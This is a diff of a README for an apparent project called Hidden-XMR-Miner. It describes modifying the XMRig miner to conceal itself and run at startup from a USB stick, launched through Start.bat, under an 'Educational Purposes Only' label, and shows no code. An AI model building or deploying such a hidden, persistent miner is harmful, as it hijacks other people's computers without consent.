KovasMcCann/Hidden-XMR-Miner/README.md

 <code>** Educational Purposes Only **</code>

 ## Idea
 A simple addition to XMrig that allows XMrig to mask it self and run on startup.
-This program is designed to run on USB.
+This program is designed to run on a USB stick.
 ## Usage
 ````
 Start.bat